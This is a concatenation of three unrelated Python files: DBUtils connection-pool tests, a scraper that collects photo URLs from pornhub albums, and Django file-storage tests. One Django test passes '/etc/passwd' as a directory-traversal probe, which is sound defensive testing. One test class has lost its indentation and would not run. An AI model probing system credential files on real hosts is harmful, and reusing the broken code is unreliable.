        self.assertEqual(pool._cache.qsize(), 0)
        self.assertEqual(db.num_queries, 0)
        db.query('select test')
        self.assertEqual(db.num_queries, 1)
        db.close()
        self.assert_(not hasattr(db, 'num_queries'))
        db = pool.connection()
        self.assert_(hasattr(db, 'dbname'))
        self.assertEqual(db.dbname, 'PooledPgTestDB')
        self.assert_(hasattr(db, 'user'))
        self.assertEqual(db.user, 'PooledPgTestUser')
        # num_queries survives because the same underlying connection is reused
        self.assertEqual(db.num_queries, 1)
        db.query('select test')
        self.assertEqual(db.num_queries, 2)
        db = pool.connection()
        self.assertEqual(pool._cache.qsize(), 1)
        self.assertEqual(pool._cache.get(0), db_con)

    def test3_MinMaxCached(self):
        """mincached prefills the cache; maxcached caps what is kept on close."""
        pool = PooledPg(3)
        self.assert_(hasattr(pool, '_cache'))
        self.assertEqual(pool._cache.qsize(), 3)
        cache = []
        for i in range(3):
            cache.append(pool.connection())
        self.assertEqual(pool._cache.qsize(), 0)
        for i in range(3):
            cache.pop().close()
        self.assertEqual(pool._cache.qsize(), 3)
        for i in range(6):
            cache.append(pool.connection())
        self.assertEqual(pool._cache.qsize(), 0)
        for i in range(6):
            cache.pop().close()
        # with no maxcached, all six connections are kept
        self.assertEqual(pool._cache.qsize(), 6)
        pool = PooledPg(3, 4)
        self.assert_(hasattr(pool, '_cache'))
        self.assertEqual(pool._cache.qsize(), 3)
        cache = []
        for i in range(3):
            cache.append(pool.connection())
        self.assertEqual(pool._cache.qsize(), 0)
        for i in range(3):
            cache.pop().close()
        self.assertEqual(pool._cache.qsize(), 3)
        for i in range(6):
            cache.append(pool.connection())
        self.assertEqual(pool._cache.qsize(), 0)
        for i in range(6):
            cache.pop().close()
        # maxcached=4 discards the two surplus connections
        self.assertEqual(pool._cache.qsize(), 4)
        pool = PooledPg(3, 2)
        self.assert_(hasattr(pool, '_cache'))
        self.assertEqual(pool._cache.qsize(), 3)
        cache = []
        for i in range(4):
            cache.append(pool.connection())
        self.assertEqual(pool._cache.qsize(), 0)
        for i in range(4):
            cache.pop().close()
        # maxcached below mincached is effectively raised to mincached
        self.assertEqual(pool._cache.qsize(), 3)
        pool = PooledPg(2, 5)
        self.assert_(hasattr(pool, '_cache'))
        self.assertEqual(pool._cache.qsize(), 2)
        cache = []
        for i in range(10):
            cache.append(pool.connection())
        self.assertEqual(pool._cache.qsize(), 0)
        for i in range(10):
            cache.pop().close()
        self.assertEqual(pool._cache.qsize(), 5)

    def test4_MaxConnections(self):
        """maxconnections limits checkouts; blocking pools wait instead of raising."""
        from DBUtils.PooledPg import TooManyConnections
        pool = PooledPg(1, 2, 3)
        self.assertEqual(pool._cache.qsize(), 1)
        cache = []
        for i in range(3):
            cache.append(pool.connection())
        self.assertEqual(pool._cache.qsize(), 0)
        self.assertRaises(TooManyConnections, pool.connection)
        pool = PooledPg(0, 1, 1, False)
        self.assertEqual(pool._blocking, 0)
        self.assertEqual(pool._cache.qsize(), 0)
        db = pool.connection()
        self.assertEqual(pool._cache.qsize(), 0)
        self.assertRaises(TooManyConnections, pool.connection)
        pool = PooledPg(1, 2, 1)
        self.assertEqual(pool._cache.qsize(), 1)
        cache = []
        cache.append(pool.connection())
        self.assertEqual(pool._cache.qsize(), 0)
        cache.append(pool.connection())
        self.assertEqual(pool._cache.qsize(), 0)
        self.assertRaises(TooManyConnections, pool.connection)
        pool = PooledPg(3, 2, 1, False)
        self.assertEqual(pool._cache.qsize(), 3)
        cache = []
        for i in range(3):
            cache.append(pool.connection())
        self.assertEqual(pool._cache.qsize(), 0)
        self.assertRaises(TooManyConnections, pool.connection)
        pool = PooledPg(1, 1, 1, True)
        self.assertEqual(pool._blocking, 1)
        self.assertEqual(pool._cache.qsize(), 1)
        db = pool.connection()
        self.assertEqual(pool._cache.qsize(), 0)

        def connection():
            pool.connection().query('set thread')

        from threading import Thread
        thread = Thread(target=connection)
        thread.start()
        thread.join(0.1)
        # the thread is blocked waiting for a free connection
        # (is_alive() replaces isAlive(), which was removed in Python 3.9)
        self.assert_(thread.is_alive())
        self.assertEqual(pool._cache.qsize(), 0)
        session = db._con.session
        self.assertEqual(session, [])
        del db
        thread.join(0.1)
        # releasing db unblocked the waiting thread, which has now finished
        self.assert_(not thread.is_alive())
        self.assertEqual(pool._cache.qsize(), 1)
        db = pool.connection()
        self.assertEqual(pool._cache.qsize(), 0)
        self.assertEqual(session, ['thread'])

    def test5_OneThreadTwoConnections(self):
        """One thread may hold two distinct pooled connections at once."""
        pool = PooledPg(2)
        db1 = pool.connection()
        for i in range(5):
            db1.query('select test')
        db2 = pool.connection()
        self.assertNotEqual(db1, db2)
        self.assertNotEqual(db1._con, db2._con)
        for i in range(7):
            db2.query('select test')
        self.assertEqual(db1.num_queries, 5)
        self.assertEqual(db2.num_queries, 7)
        del db1
        db1 = pool.connection()
        self.assertNotEqual(db1, db2)
        self.assertNotEqual(db1._con, db2._con)
        self.assert_(hasattr(db1, 'query'))
        for i in range(3):
            db1.query('select test')
        self.assertEqual(db1.num_queries, 8)
        db2.query('select test')
        self.assertEqual(db2.num_queries, 8)

    def test6_ThreeThreadsTwoConnections(self):
        """Three threads compete for two connections; the third must wait.

        The try/except TypeError fallbacks keep the test working across
        Queue APIs that differ in their timeout signatures.
        """
        pool = PooledPg(2, 2, 2, True)
        from Queue import Queue, Empty
        queue = Queue(3)

        def connection():
            try:
                queue.put(pool.connection(), 1, 1)
            except TypeError:
                queue.put(pool.connection(), 1)

        from threading import Thread
        for i in range(3):
            Thread(target=connection).start()
        try:
            db1 = queue.get(1, 1)
            db2 = queue.get(1, 1)
        except TypeError:
            db1 = queue.get(1)
            db2 = queue.get(1)
        db1_con = db1._con
        db2_con = db2._con
        self.assertNotEqual(db1, db2)
        self.assertNotEqual(db1_con, db2_con)
        try:
            # the third thread cannot get a connection yet
            self.assertRaises(Empty, queue.get, 1, 0.1)
        except TypeError:
            self.assertRaises(Empty, queue.get, 0)
        del db1
        try:
            db1 = queue.get(1, 1)
        except TypeError:
            db1 = queue.get(1)
        self.assertNotEqual(db1, db2)
        self.assertNotEqual(db1._con, db2._con)
        # the released underlying connection is handed to the waiting thread
        self.assertEqual(db1._con, db1_con)
# Run the test suite when this module is executed directly.
if __name__ == '__main__':
    unittest.main()
|
photos.py | # -*- coding: UTF-8 -*-
from .core import *
class Photos(object):
    """Scraper that collects full-size photo URLs from albums matching keywords."""

    # Keywords that select an album category; any other keyword becomes a
    # free-text search term (replaces the original five-way elif chain).
    CATEGORY_KEYWORDS = ("female", "straight", "misc", "male", "gay")

    def __init__(self, ProxyDictionary, keywords=None, *args):
        # `keywords=None` instead of the original mutable `[]` default:
        # a mutable default is shared across all instances (classic pitfall).
        self.keywords = keywords if keywords is not None else []
        self.ProxyDictionary = ProxyDictionary
        # Worker threads push resolved full-size photo URLs here.
        self.photos_queue = Queue()

    def _loadAlbumsPage(self, page_num):
        """Fetch one albums listing page and return it parsed with BeautifulSoup.

        url example:
        pornhub.com/albums/female-straight?search=arg1+arg2
        pornhub.com/albums/uncategorized?search=arg1&page=3
        """
        payload = {"search": "", "page": page_num}
        categories = list()
        for item in self.keywords:
            if item in self.CATEGORY_KEYWORDS:
                categories.append(item)
            else:
                # non-category keywords accumulate into the search string
                payload["search"] += (item + " ")
        search_url = BASE_URL + ALBUMS_URL + "-".join(categories) + "?"
        r = requests.get(search_url, params=payload, headers=HEADERS, proxies=self.ProxyDictionary)
        html = r.text
        return BeautifulSoup(html, "lxml")

    def _scrapAlbumsURL(self, soup_data):
        """Return the album page URLs found in a parsed listing page."""
        album_divs = soup_data.find_all("div", {"class": "photoAlbumListBlock"})
        albums_url = list()
        for album_div in album_divs:
            for a_tag in album_div.find_all("a", href=True):
                url = a_tag.attrs["href"]
                if isAlbum(url):
                    albums_url.append(BASE_URL + url)
                    # one album link per listing block is enough
                    break
        return albums_url

    def _scrapPhotoFullURL(self, preview_url):
        """Resolve a preview page to the full-size photo URL.

        Puts the URL on ``photos_queue`` and returns it; returns False when
        no photo is found on the page.
        """
        r = requests.get(preview_url, headers=HEADERS, proxies=self.ProxyDictionary)
        html = r.text
        soup = BeautifulSoup(html, "lxml")
        for image in soup.find_all("img", src=True):
            image_url = image.attrs["src"]
            if isPhoto(image_url):
                self.photos_queue.put(str(image_url))
                return image_url
        return False

    def _scrapAlbumPhotos(self, album_url):
        """Yield photo preview-page URLs found in an album page."""
        r = requests.get(album_url, headers=HEADERS, proxies=self.ProxyDictionary)
        html = r.text
        soup = BeautifulSoup(html, "lxml")
        for possible_image in soup.find_all("a", href=True):
            try:
                preview_url = possible_image.attrs["href"]
                if isPhotoPreview(preview_url):
                    yield (BASE_URL + preview_url)
            except Exception:
                # malformed anchors are skipped on a best-effort basis
                pass

    def getPhotos(self, quantity=1, page=1, infinity=False):
        """
        Download photos.
        :param quantity: number of photos to return
        :param page: starting page number
        :param infinity: never stop downloading
        """
        quantity = quantity if quantity >= 1 else 1
        page = page if page >= 1 else 1
        found = 0
        workers = list()
        while True:
            for album_url in self._scrapAlbumsURL(self._loadAlbumsPage(page)):
                for preview_url in self._scrapAlbumPhotos(album_url):
                    worker = Thread(target=self._scrapPhotoFullURL, kwargs={"preview_url": preview_url})
                    worker.start()
                    workers.append(worker)
                    while not self.photos_queue.empty():
                        if (found < quantity) or infinity:
                            yield self.photos_queue.get()
                            found += 1
                        else:
                            # PEP 479 fix: `raise StopIteration` inside a
                            # generator becomes RuntimeError on Python 3.7+;
                            # a plain `return` ends the generator correctly.
                            return
                    # throttle: pause after every 4th worker spawned
                    if (len(workers) + 1) % 4 == 0:
                        time.sleep(TIME_TO_WAIT)
            page += 1
|
tests.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import errno
import os
import shutil
import sys
import tempfile
import time
import unittest
from datetime import datetime, timedelta
try:
import threading
except ImportError:
import dummy_threading as threading
from django.core.cache import cache
from django.core.exceptions import SuspiciousOperation
from django.core.files.base import File, ContentFile
from django.core.files.storage import FileSystemStorage, get_storage_class
from django.core.files.uploadedfile import SimpleUploadedFile
from django.test import LiveServerTestCase, SimpleTestCase
from django.test import override_settings
from django.utils import six
from django.utils.six.moves.urllib.request import urlopen
from django.utils._os import upath
from .models import Storage, temp_storage, temp_storage_location
class GetStorageClassTests(SimpleTestCase):
    """Behavior of the get_storage_class() import helper."""

    def test_get_filesystem_storage(self):
        """
        get_storage_class returns the class for a storage backend name/path.
        """
        resolved = get_storage_class('django.core.files.storage.FileSystemStorage')
        self.assertEqual(resolved, FileSystemStorage)

    def test_get_invalid_storage_module(self):
        """
        get_storage_class raises an error if the requested import don't exist.
        """
        with six.assertRaisesRegex(self, ImportError, "No module named '?storage'?"):
            get_storage_class('storage.NonExistingStorage')

    def test_get_nonexisting_storage_class(self):
        """
        get_storage_class raises an error if the requested class don't exist.
        """
        with self.assertRaises(ImportError):
            get_storage_class('django.core.files.storage.NonExistingStorage')

    def test_get_nonexisting_storage_module(self):
        """
        get_storage_class raises an error if the requested module don't exist.
        """
        # Error message may or may not be the fully qualified path.
        with six.assertRaisesRegex(self, ImportError,
                "No module named '?(django.core.files.)?non_existing_storage'?"):
            get_storage_class(
                'django.core.files.non_existing_storage.NonExistingStorage')
class FileStorageDeconstructionTests(unittest.TestCase):
    """FileSystemStorage deconstructs into (path, args, kwargs) for migrations."""

    def test_deconstruction(self):
        # Default storage: only the location kwarg is recorded.
        path, args, kwargs = temp_storage.deconstruct()
        self.assertEqual(path, "django.core.files.storage.FileSystemStorage")
        self.assertEqual(args, tuple())
        self.assertEqual(kwargs, {'location': temp_storage_location})
        # Custom kwargs must round-trip through deconstruct() unchanged.
        custom_kwargs = {
            'base_url': 'http://myfiles.example.com/',
            'location': temp_storage_location,
        }
        storage = FileSystemStorage(**custom_kwargs)
        path, args, kwargs = storage.deconstruct()
        self.assertEqual(kwargs, custom_kwargs)
class FileStorageTests(unittest.TestCase):
    """Exercise the FileSystemStorage API against a temporary directory.

    Fixes applied: test_remove_race_handling re-checked 'normal.file'
    instead of 'raced.file' (copy-paste bug, leaving the raced deletion
    unverified); test_empty_location's docstring wrongly claimed an
    exception is raised; comment typo "stanslate".
    """
    storage_class = FileSystemStorage

    def setUp(self):
        self.temp_dir = tempfile.mkdtemp()
        self.storage = self.storage_class(location=self.temp_dir,
            base_url='/test_media_url/')
        # Set up a second temporary directory which is ensured to have a mixed
        # case name.
        self.temp_dir2 = tempfile.mkdtemp(suffix='aBc')

    def tearDown(self):
        shutil.rmtree(self.temp_dir)
        shutil.rmtree(self.temp_dir2)

    def test_empty_location(self):
        """
        An empty location falls back to the current working directory.
        """
        storage = self.storage_class(location='')
        self.assertEqual(storage.base_location, '')
        self.assertEqual(storage.location, upath(os.getcwd()))

    def test_file_access_options(self):
        """
        Standard file access options are available, and work as expected.
        """
        self.assertFalse(self.storage.exists('storage_test'))
        f = self.storage.open('storage_test', 'w')
        f.write('storage contents')
        f.close()
        self.assertTrue(self.storage.exists('storage_test'))
        f = self.storage.open('storage_test', 'r')
        self.assertEqual(f.read(), 'storage contents')
        f.close()
        self.storage.delete('storage_test')
        self.assertFalse(self.storage.exists('storage_test'))

    def test_file_accessed_time(self):
        """
        File storage returns a Datetime object for the last accessed time of
        a file.
        """
        self.assertFalse(self.storage.exists('test.file'))
        f = ContentFile('custom contents')
        f_name = self.storage.save('test.file', f)
        atime = self.storage.accessed_time(f_name)
        self.assertEqual(atime, datetime.fromtimestamp(
            os.path.getatime(self.storage.path(f_name))))
        self.assertTrue(datetime.now() - self.storage.accessed_time(f_name) < timedelta(seconds=2))
        self.storage.delete(f_name)

    def test_file_created_time(self):
        """
        File storage returns a Datetime object for the creation time of
        a file.
        """
        self.assertFalse(self.storage.exists('test.file'))
        f = ContentFile('custom contents')
        f_name = self.storage.save('test.file', f)
        ctime = self.storage.created_time(f_name)
        self.assertEqual(ctime, datetime.fromtimestamp(
            os.path.getctime(self.storage.path(f_name))))
        self.assertTrue(datetime.now() - self.storage.created_time(f_name) < timedelta(seconds=2))
        self.storage.delete(f_name)

    def test_file_modified_time(self):
        """
        File storage returns a Datetime object for the last modified time of
        a file.
        """
        self.assertFalse(self.storage.exists('test.file'))
        f = ContentFile('custom contents')
        f_name = self.storage.save('test.file', f)
        mtime = self.storage.modified_time(f_name)
        self.assertEqual(mtime, datetime.fromtimestamp(
            os.path.getmtime(self.storage.path(f_name))))
        self.assertTrue(datetime.now() - self.storage.modified_time(f_name) < timedelta(seconds=2))
        self.storage.delete(f_name)

    def test_file_save_without_name(self):
        """
        File storage extracts the filename from the content object if no
        name is given explicitly.
        """
        self.assertFalse(self.storage.exists('test.file'))
        f = ContentFile('custom contents')
        f.name = 'test.file'
        storage_f_name = self.storage.save(None, f)
        self.assertEqual(storage_f_name, f.name)
        self.assertTrue(os.path.exists(os.path.join(self.temp_dir, f.name)))
        self.storage.delete(storage_f_name)

    def test_file_save_with_path(self):
        """
        Saving a pathname should create intermediate directories as necessary.
        """
        self.assertFalse(self.storage.exists('path/to'))
        self.storage.save('path/to/test.file',
            ContentFile('file saved with path'))
        self.assertTrue(self.storage.exists('path/to'))
        with self.storage.open('path/to/test.file') as f:
            self.assertEqual(f.read(), b'file saved with path')
        self.assertTrue(os.path.exists(
            os.path.join(self.temp_dir, 'path', 'to', 'test.file')))
        self.storage.delete('path/to/test.file')

    def test_file_path(self):
        """
        File storage returns the full path of a file
        """
        self.assertFalse(self.storage.exists('test.file'))
        f = ContentFile('custom contents')
        f_name = self.storage.save('test.file', f)
        self.assertEqual(self.storage.path(f_name),
            os.path.join(self.temp_dir, f_name))
        self.storage.delete(f_name)

    def test_file_url(self):
        """
        File storage returns a url to access a given file from the Web.
        """
        self.assertEqual(self.storage.url('test.file'),
            '%s%s' % (self.storage.base_url, 'test.file'))
        # should encode special chars except ~!*()'
        # like encodeURIComponent() JavaScript function do
        self.assertEqual(self.storage.url(r"""~!*()'@#$%^&*abc`+ =.file"""),
            """/test_media_url/~!*()'%40%23%24%25%5E%26*abc%60%2B%20%3D.file""")
        # should translate os path separator(s) to the url path separator
        self.assertEqual(self.storage.url("""a/b\\c.file"""),
            """/test_media_url/a/b/c.file""")
        self.storage.base_url = None
        self.assertRaises(ValueError, self.storage.url, 'test.file')
        # #22717: missing ending slash in base_url should be auto-corrected
        storage = self.storage_class(location=self.temp_dir,
            base_url='/no_ending_slash')
        self.assertEqual(
            storage.url('test.file'),
            '%s%s' % (storage.base_url, 'test.file')
        )

    def test_listdir(self):
        """
        File storage returns a tuple containing directories and files.
        """
        self.assertFalse(self.storage.exists('storage_test_1'))
        self.assertFalse(self.storage.exists('storage_test_2'))
        self.assertFalse(self.storage.exists('storage_dir_1'))
        self.storage.save('storage_test_1', ContentFile('custom content'))
        self.storage.save('storage_test_2', ContentFile('custom content'))
        os.mkdir(os.path.join(self.temp_dir, 'storage_dir_1'))
        dirs, files = self.storage.listdir('')
        self.assertEqual(set(dirs), set(['storage_dir_1']))
        self.assertEqual(set(files),
            set(['storage_test_1', 'storage_test_2']))
        self.storage.delete('storage_test_1')
        self.storage.delete('storage_test_2')
        os.rmdir(os.path.join(self.temp_dir, 'storage_dir_1'))

    def test_file_storage_prevents_directory_traversal(self):
        """
        File storage prevents directory traversal (files can only be accessed if
        they're below the storage location).
        """
        self.assertRaises(SuspiciousOperation, self.storage.exists, '..')
        self.assertRaises(SuspiciousOperation, self.storage.exists, '/etc/passwd')

    def test_file_storage_preserves_filename_case(self):
        """The storage backend should preserve case of filenames."""
        # Create a storage backend associated with the mixed case name
        # directory.
        other_temp_storage = self.storage_class(location=self.temp_dir2)
        # Ask that storage backend to store a file with a mixed case filename.
        mixed_case = 'CaSe_SeNsItIvE'
        file = other_temp_storage.open(mixed_case, 'w')
        file.write('storage contents')
        file.close()
        self.assertEqual(os.path.join(self.temp_dir2, mixed_case),
            other_temp_storage.path(mixed_case))
        other_temp_storage.delete(mixed_case)

    def test_makedirs_race_handling(self):
        """
        File storage should be robust against directory creation race conditions.
        """
        real_makedirs = os.makedirs
        # Monkey-patch os.makedirs, to simulate a normal call, a raced call,
        # and an error.
        def fake_makedirs(path):
            if path == os.path.join(self.temp_dir, 'normal'):
                real_makedirs(path)
            elif path == os.path.join(self.temp_dir, 'raced'):
                real_makedirs(path)
                raise OSError(errno.EEXIST, 'simulated EEXIST')
            elif path == os.path.join(self.temp_dir, 'error'):
                raise OSError(errno.EACCES, 'simulated EACCES')
            else:
                self.fail('unexpected argument %r' % path)
        try:
            os.makedirs = fake_makedirs
            self.storage.save('normal/test.file',
                ContentFile('saved normally'))
            with self.storage.open('normal/test.file') as f:
                self.assertEqual(f.read(), b'saved normally')
            self.storage.save('raced/test.file',
                ContentFile('saved with race'))
            with self.storage.open('raced/test.file') as f:
                self.assertEqual(f.read(), b'saved with race')
            # Check that OSErrors aside from EEXIST are still raised.
            self.assertRaises(OSError,
                self.storage.save, 'error/test.file', ContentFile('not saved'))
        finally:
            os.makedirs = real_makedirs

    def test_remove_race_handling(self):
        """
        File storage should be robust against file removal race conditions.
        """
        real_remove = os.remove
        # Monkey-patch os.remove, to simulate a normal call, a raced call,
        # and an error.
        def fake_remove(path):
            if path == os.path.join(self.temp_dir, 'normal.file'):
                real_remove(path)
            elif path == os.path.join(self.temp_dir, 'raced.file'):
                real_remove(path)
                raise OSError(errno.ENOENT, 'simulated ENOENT')
            elif path == os.path.join(self.temp_dir, 'error.file'):
                raise OSError(errno.EACCES, 'simulated EACCES')
            else:
                self.fail('unexpected argument %r' % path)
        try:
            os.remove = fake_remove
            self.storage.save('normal.file', ContentFile('delete normally'))
            self.storage.delete('normal.file')
            self.assertFalse(self.storage.exists('normal.file'))
            self.storage.save('raced.file', ContentFile('delete with race'))
            self.storage.delete('raced.file')
            # Fixed copy-paste bug: this previously re-checked 'normal.file',
            # so the raced deletion itself was never verified.
            self.assertFalse(self.storage.exists('raced.file'))
            # Check that OSErrors aside from ENOENT are still raised.
            self.storage.save('error.file', ContentFile('delete with error'))
            self.assertRaises(OSError, self.storage.delete, 'error.file')
        finally:
            os.remove = real_remove

    def test_file_chunks_error(self):
        """
        Test behavior when file.chunks() is raising an error
        """
        f1 = ContentFile('chunks fails')
        def failing_chunks():
            raise IOError
        f1.chunks = failing_chunks
        with self.assertRaises(IOError):
            self.storage.save('error.file', f1)

    def test_delete_no_name(self):
        """
        Calling delete with an empty name should not try to remove the base
        storage directory, but fail loudly (#20660).
        """
        with self.assertRaises(AssertionError):
            self.storage.delete('')
class CustomStorage(FileSystemStorage):
    def get_available_name(self, name):
        """
        Append numbers to duplicate files rather than underscores, like Trac.
        """
        pieces = name.split('.')
        stem, suffixes = pieces[0], pieces[1:]
        counter = 2
        # Keep bumping the counter until the candidate name is free.
        while self.exists(name):
            name = '.'.join([stem, str(counter)] + suffixes)
            counter += 1
        return name
class CustomStorageTests(FileStorageTests):
    # Re-runs the whole FileStorageTests suite against CustomStorage.
    storage_class = CustomStorage

    def test_custom_get_available_name(self):
        # Duplicate names get a ".2" suffix (Trac style) rather than the
        # default underscore-number scheme.
        first = self.storage.save('custom_storage', ContentFile('custom contents'))
        self.assertEqual(first, 'custom_storage')
        second = self.storage.save('custom_storage', ContentFile('more contents'))
        self.assertEqual(second, 'custom_storage.2')
        self.storage.delete(first)
        self.storage.delete(second)
class FileFieldStorageTests(unittest.TestCase):
def tearDown(self):
shutil.rmtree(temp_storage_location)
def test_files(self):
# Attempting to access a FileField from the class raises a descriptive
# error
self.assertRaises(AttributeError, lambda: Storage.normal)
# An object without a file has limited functionality.
obj1 = Storage()
self.assertEqual(obj1.normal.name, "")
self.assertRaises(ValueError, lambda: obj1.normal.size)
# Saving a file enables full functionality.
obj1.normal.save("django_test.txt", ContentFile("content"))
self.assertEqual(obj1.normal.name, "tests/django_test.txt")
self.assertEqual(obj1.normal.size, 7)
self.assertEqual(obj1.normal.read(), b"content")
obj1.normal.close()
# File objects can be assigned to FileField attributes, but shouldn't
# get committed until the model it's attached to is saved.
obj1.normal = SimpleUploadedFile("assignment.txt", b"content")
dirs, files = temp_storage.listdir("tests")
self.assertEqual(dirs, [])
self.assertFalse("assignment.txt" in files)
obj1.save()
dirs, files = temp_storage.listdir("tests")
self.assertEqual(sorted(files), ["assignment.txt", "django_test.txt"])
# Save another file with the same name.
obj2 = Storage()
obj2.normal.save("django_test.txt", ContentFile("more content"))
self.assertEqual(obj2.normal.name, "tests/django_test_1.txt")
self.assertEqual(obj2.normal.size, 12)
obj2.normal.close()
# Deleting an object does not delete the file it uses.
obj2.delete()
obj2.normal.save("django_test.txt", ContentFile("more content"))
self.assertEqual(obj2.normal.name, "tests/django_test_2.txt")
obj2.normal.close()
def test_filefield_read(self):
# Files can be read in a little at a time, if necessary.
obj = Storage.objects.create(
normal=SimpleUploadedFile("assignment.txt", b"content"))
obj.normal.open()
self.assertEqual(obj.normal.read(3), b"con")
self.assertEqual(obj.normal.read(), b"tent")
self.assertEqual(list(obj.normal.chunks(chunk_size=2)), [b"co", b"nt", b"en", b"t"])
obj.normal.close()
def test_file_numbering(self):
# Multiple files with the same name get _N appended to them.
objs = [Storage() for i in range(3)]
for o in objs:
o.normal.save("multiple_files.txt", ContentFile("Same Content"))
self.assertEqual(
[o.normal.name for o in objs],
["tests/multiple_files.txt", "tests/multiple_files_1.txt", "tests/multiple_files_2.txt"]
)
for o in objs:
o.delete()
def test_filefield_default(self):
# Default values allow an object to access a single file.
temp_storage.save('tests/default.txt', ContentFile('default content'))
obj = Storage.objects.create()
self.assertEqual(obj.default.name, "tests/default.txt")
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
# But it shouldn't be deleted, even if there are no more objects using
# it.
obj.delete()
obj = Storage()
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
def test_empty_upload_to(self):
# upload_to can be empty, meaning it does not use subdirectory.
obj = Storage()
obj.empty.save('django_test.txt', ContentFile('more content'))
self.assertEqual(obj.empty.name, "./django_test.txt")
self.assertEqual(obj.empty.read(), b"more content")
obj.empty.close()
def test_random_upload_to(self):
# Verify the fix for #5655, making sure the directory is only
# determined once.
obj = Storage()
obj.random.save("random_file", ContentFile("random content"))
self.assertTrue(obj.random.name.endswith("/random_file"))
obj.random.close()
def test_filefield_pickling(self):
# Push an object into the cache to make sure it pickles properly
obj = Storage()
obj.normal.save("django_test.txt", ContentFile("more content"))
obj.normal.close()
cache.set("obj", obj)
self.assertEqual(cache.get("obj").normal.name, "tests/django_test.txt")
def test_file_object(self):
# Create sample file
temp_storage.save('tests/example.txt', ContentFile('some content'))
# Load it as python file object
with open(temp_storage.path('tests/example.txt')) as file_obj:
# Save it using storage and read its content
temp_storage.save('tests/file_obj', file_obj)
self.assertTrue(temp_storage.exists('tests/file_obj'))
with temp_storage.open('tests/file_obj') as f:
self.assertEqual(f.read(), b'some content')
def test_stringio(self):
    """Storage.save() accepts a StringIO instance as content."""
    # Test passing StringIO instance as content argument to save
    output = six.StringIO()
    output.write('content')
    output.seek(0)
    # Save it and read written file
    temp_storage.save('tests/stringio', output)
    self.assertTrue(temp_storage.exists('tests/stringio'))
    with temp_storage.open('tests/stringio') as f:
        self.assertEqual(f.read(), b'content')
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
    """A ContentFile whose chunks() stalls, used to provoke the save race (#4948)."""
    def chunks(self):
        time.sleep(1)
        # Fixed: super() must be called with the *current* class. The
        # original ``super(ContentFile, self)`` skipped ContentFile itself
        # in the MRO and dispatched straight to File.chunks().
        return super(SlowFile, self).chunks()
class FileSaveRaceConditionTest(unittest.TestCase):
    """Two concurrent saves of the same name must yield distinct files (#4948)."""
    def setUp(self):
        self.storage_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(self.storage_dir)
        # Background saver racing against the main thread for 'conflict'.
        self.thread = threading.Thread(target=self.save_file, args=['conflict'])
    def tearDown(self):
        shutil.rmtree(self.storage_dir)
    def save_file(self, name):
        name = self.storage.save(name, SlowFile(b"Data"))
    def test_race_condition(self):
        # Both saves target the same name; the loser must be suffixed,
        # not clobber the winner.
        self.thread.start()
        self.save_file('conflict')
        self.thread.join()
        self.assertTrue(self.storage.exists('conflict'))
        self.assertTrue(self.storage.exists('conflict_1'))
        self.storage.delete('conflict')
        self.storage.delete('conflict_1')
@unittest.skipIf(sys.platform.startswith('win'), "Windows only partially supports umasks and chmod.")
class FileStoragePermissions(unittest.TestCase):
    """Uploaded file/directory modes honor the FILE_UPLOAD_* settings and umask."""
    def setUp(self):
        # Force a known umask so the default-permission tests are deterministic.
        self.umask = 0o027
        self.old_umask = os.umask(self.umask)
        self.storage_dir = tempfile.mkdtemp()
    def tearDown(self):
        shutil.rmtree(self.storage_dir)
        os.umask(self.old_umask)
    @override_settings(FILE_UPLOAD_PERMISSIONS=0o654)
    def test_file_upload_permissions(self):
        # An explicit setting wins over the process umask.
        self.storage = FileSystemStorage(self.storage_dir)
        name = self.storage.save("the_file", ContentFile("data"))
        actual_mode = os.stat(self.storage.path(name))[0] & 0o777
        self.assertEqual(actual_mode, 0o654)
    @override_settings(FILE_UPLOAD_PERMISSIONS=None)
    def test_file_upload_default_permissions(self):
        # With no setting, the mode is 0o666 filtered through the umask.
        self.storage = FileSystemStorage(self.storage_dir)
        fname = self.storage.save("some_file", ContentFile("data"))
        mode = os.stat(self.storage.path(fname))[0] & 0o777
        self.assertEqual(mode, 0o666 & ~self.umask)
    @override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o765)
    def test_file_upload_directory_permissions(self):
        self.storage = FileSystemStorage(self.storage_dir)
        name = self.storage.save("the_directory/the_file", ContentFile("data"))
        dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
        self.assertEqual(dir_mode, 0o765)
    @override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=None)
    def test_file_upload_directory_default_permissions(self):
        # Implicitly-created directories default to 0o777 filtered by umask.
        self.storage = FileSystemStorage(self.storage_dir)
        name = self.storage.save("the_directory/the_file", ContentFile("data"))
        dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
        self.assertEqual(dir_mode, 0o777 & ~self.umask)
class FileStoragePathParsing(unittest.TestCase):
    """Name-collision mangling must touch the file name, never the directory."""
    def setUp(self):
        self.storage_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(self.storage_dir)
    def tearDown(self):
        shutil.rmtree(self.storage_dir)
    def test_directory_with_dot(self):
        """Regression test for #9610.
        If the directory name contains a dot and the file name doesn't, make
        sure we still mangle the file name instead of the directory name.
        """
        self.storage.save('dotted.path/test', ContentFile("1"))
        self.storage.save('dotted.path/test', ContentFile("2"))
        self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
        self.assertTrue(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/test')))
        self.assertTrue(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/test_1')))
    def test_first_character_dot(self):
        """
        File names with a dot as their first character don't have an extension,
        and the underscore should get added to the end.
        """
        self.storage.save('dotted.path/.test', ContentFile("1"))
        self.storage.save('dotted.path/.test', ContentFile("2"))
        self.assertTrue(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/.test')))
        self.assertTrue(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/.test_1')))
class ContentFileStorageTestCase(unittest.TestCase):
    """ContentFile works with FileSystemStorage for both bytes and text."""
    def setUp(self):
        self.storage_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(self.storage_dir)
    def tearDown(self):
        shutil.rmtree(self.storage_dir)
    def test_content_saving(self):
        """
        Test that ContentFile can be saved correctly with the filesystem storage,
        both if it was initialized with string or unicode content"""
